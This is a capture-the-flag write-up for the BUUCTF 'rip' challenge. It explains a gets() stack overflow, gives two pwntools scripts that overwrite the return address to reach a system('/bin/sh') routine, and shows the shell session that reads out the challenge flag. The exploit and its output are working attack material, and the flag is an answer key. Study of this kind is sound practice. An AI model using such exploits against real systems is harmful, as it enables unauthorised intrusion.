BUU-2-rip
lxl@lxl-vm:~/BUU/rip$ file pwn1 pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1c72ddcad651c7f35bb655e0ddda5ecbf8d31999, not stripped
IDA 64
/*
 * IDA pseudocode of pwn1's main(), re-broken into lines (the one-line form on the
 * page puts the "// [rsp+1h] [rbp-Fh]" comment in front of the remaining
 * statements, which would comment them out).
 *
 * The only local, `s`, sits at rbp-0xF and is filled by gets(), which has no
 * length bound.  Input longer than 0xF bytes therefore runs past `s` into the
 * saved rbp (8 bytes) and then the saved return address; this is where the
 * writeup's "0xF+8" offset comes from.  The defensive fix is a length-bounded
 * read (e.g. fgets with the buffer size) in place of gets().
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char s; // [rsp+1h] [rbp-Fh]

    puts("please input");
    gets(&s, argv);   // decompiler artefact: gets() takes a single argument; no bound on the read
    puts(&s);
    puts("ok,bye!!!");
    return 0;
}
gets 不限制输入长度，可溢出
偏移量: 0xF（s 到 rbp）+ 8（保存的 rbp）
直接 Shift+F12 查看字符串窗口
; IDA listing of `fun`, re-broken into one line per address (tokens unchanged).
; `fun` is not called from main() (see the pseudocode above); it is a leftover
; routine that just does system("/bin/sh").  Its start address 0x401186 is the
; value the writeup places over the saved return address.
.text:0000000000401186
.text:0000000000401186 ; =============== S U B R O U T I N E =======================================
.text:0000000000401186
.text:0000000000401186 ; Attributes: bp-based frame
.text:0000000000401186
.text:0000000000401186                 public fun
.text:0000000000401186 fun             proc near
.text:0000000000401186 ; __unwind {
.text:0000000000401186                 push    rbp             ; key point! (original: 重点!) -- first instruction of fun, i.e. the jump target 0x401186
.text:0000000000401187                 mov     rbp, rsp
.text:000000000040118A                 lea     rdi, command    ; "/bin/sh"
.text:0000000000401191                 call    _system
.text:0000000000401196                 nop
.text:0000000000401197                 pop     rbp
.text:0000000000401198                 retn
.text:0000000000401198 ; } // starts at 401186
.text:0000000000401198 fun             endp
EXP
# First attempt from the writeup: overwrite main's return address with the
# address of `fun` (0x401186, the system("/bin/sh") stub in the IDA listing).
from pwn import *

p = remote('node3.buuoj.cn',26819)
sys_addr = 0x401186  # start of fun, taken from the .text listing
# 0xF bytes reach the saved rbp from s (at rbp-0xF), 8 more overwrite the saved
# rbp, and the next 8 land on the saved return address.
# NOTE(review): 'a'*n is str while p64() returns bytes, so this concatenation
# only works under Python 2 (the page runs it as `python pwn1.py`).
payload = 0xf*'a' +'a'*8 + p64(sys_addr)
p.sendline(payload)
p.interactive()
查看 WP 后的 EXP:
# Version taken from another writeup: identical to the first script except that
# the address of `fun` is written twice.
from pwn import *

p = remote('node3.buuoj.cn',27563)
sys_addr = 0x401186  # start of fun, taken from the .text listing
# Same 0xF + 8 padding as before (s at rbp-0xF, then the saved rbp), followed by
# the return address.  The author reports the session times out without the
# second copy of sys_addr; the page does not explain why.
# NOTE(review): str + bytes concatenation, so this too only runs under Python 2.
payload = 0xf*'a' +'a'*8 + p64(sys_addr) + p64(sys_addr)
p.sendline(payload)
p.interactive()
???为什么要多写一个地址呢???（但是这样才不会 timeout）
lxl@lxl-vm:~/BUU/rip$ python pwn1.py [+] Opening connection to node3.buuoj.cn on port 27563: Done [*] Switching to interactive mode $ ls bin boot dev etc flag home lib lib32 lib64 media mnt opt proc pwn root run sbin srv sys tmp usr var $ cat flag flag{8bd85f48-eb08-42ab-b770-62449fb5d2fe} $
flag{8bd85f48-eb08-42ab-b770-62449fb5d2fe}